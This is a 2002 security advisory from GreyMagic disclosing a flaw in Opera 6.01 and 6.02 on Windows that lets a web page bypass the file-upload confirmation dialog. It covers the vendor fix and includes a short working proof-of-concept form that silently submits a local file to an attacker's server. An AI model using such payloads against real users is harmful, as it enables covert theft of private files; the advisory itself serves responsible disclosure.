GreyMagic Security Advisory GM#001-OP
By GreyMagic Software, Israel.27 May 2002.
Topic: Reading ANY local file in Opera.
Discovery date: 07 May 2002.
Affected applications:
Opera 6.01 on Windows platforms.
Opera 6.02 on Windows platforms.
From Opera.com:
- "Opera today ranks number three among the most widely used Internet browsers in the world."
- "Opera is small, super-fast, secure, and can run at an optimal level without straining system resources. We like to say that we abide by The 5 S's in all code development: Speed, Size, Security, Standards Compliance and State-of-the-Art."
Opera, like all browsers today, supports the <input type="file"> element, which is a standard method for users to upload files to HTTP servers. Since the file element is a very security-sensitive element, most web browsers do not allow its "value" attribute to be set (read only). If it was possible to assign an arbitrary string to the "value" attribute, an attacking server could fetch any local file by simply submitting a form (through scripting or social engineering, if scripting has been disabled).
Opera's approach to the file element is a little different. The "value" attribute can be set, but before the form it resides in is submitted, a dialog comes up with the following warning:
"The files listed below have been selected, without your intervention, to be sent to another computer. Do you want to send these files?"
Discussion:It is possible to bypass the file element's confirmation dialog, which means an attacker can download any file from an unsuspecting Opera user.
By appending a simple " " (HTML entity, which represents the ASCII code for a new-line character) to the end of the file element's "value" attribute, Opera's security algorithm is fooled to think that no files were assigned. Therefore, the warning dialog doesn't come up; Opera simply submits the form with the desired file chosen by an attacker.
Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this attack. So a change that occurred between version 6.0 and 6.01 is the culprit. This also means that all of the non-windows versions are safe (Opera did not release 6.01 for other platforms yet).
Exploit:This exploit will automatically transfer the file "c:/test.txt" to an attacking host, which can handle it using a server-side environment such as ASP, PHP or other solutions. It does not require any user interaction:
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt " style="visibility:hidden">
</form>
</body>
Opera was informed on 15 May 2002 and confirmed our findings. A day later, in the evening of 16 May 2002, Opera informed us that the vulnerability was fixed and committed to Opera's own version control system.
On 27 May 2002, Opera released version 6.03, which addressed this issue.
Opera has been extremely responsive and quick to understand and patch this vulnerability. They have shown that they truly do take security seriously.
Tested on:
Opera 6.01, NT4.
Opera 6.01, Win2000.
Opera 6.01, WinXP.
Opera 6.02, NT4.
Opera 6.02, Win2000.
Opera 6.02, WinXP.
Before demonstrating this issue there are a few things to understand:
- In order to demonstrate how this vulnerability works, the content of the file has to be transferred to our server.
- Files from the demonstration will not be saved on our server under any circumstances; they will be displayed to you and immediately removed.
- Please try to use small files (under 50K) in order to test yourself. There is simply no sense in using large files.
- An "unencrypted submission" warning dialog may appear because information is transmitted in an unencrypted manner; this is a standard dialog for ANY unencrypted form submission, it is not directly related to the vulnerability. If another dialog, regarding the files submitted, does not appear after dismissing this warning then you are vulnerable. A potential attacker would simply use SSL to avoid the "unencrypted submission" dialog.
We put together two proof-of-concept demonstrations:
The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.
Vulnerability details are provided strictly for educational and defensive purposes.
GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
Stay informed:Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.
Press here to subscribe.
Your privacy is important to us, read our Privacy Statement.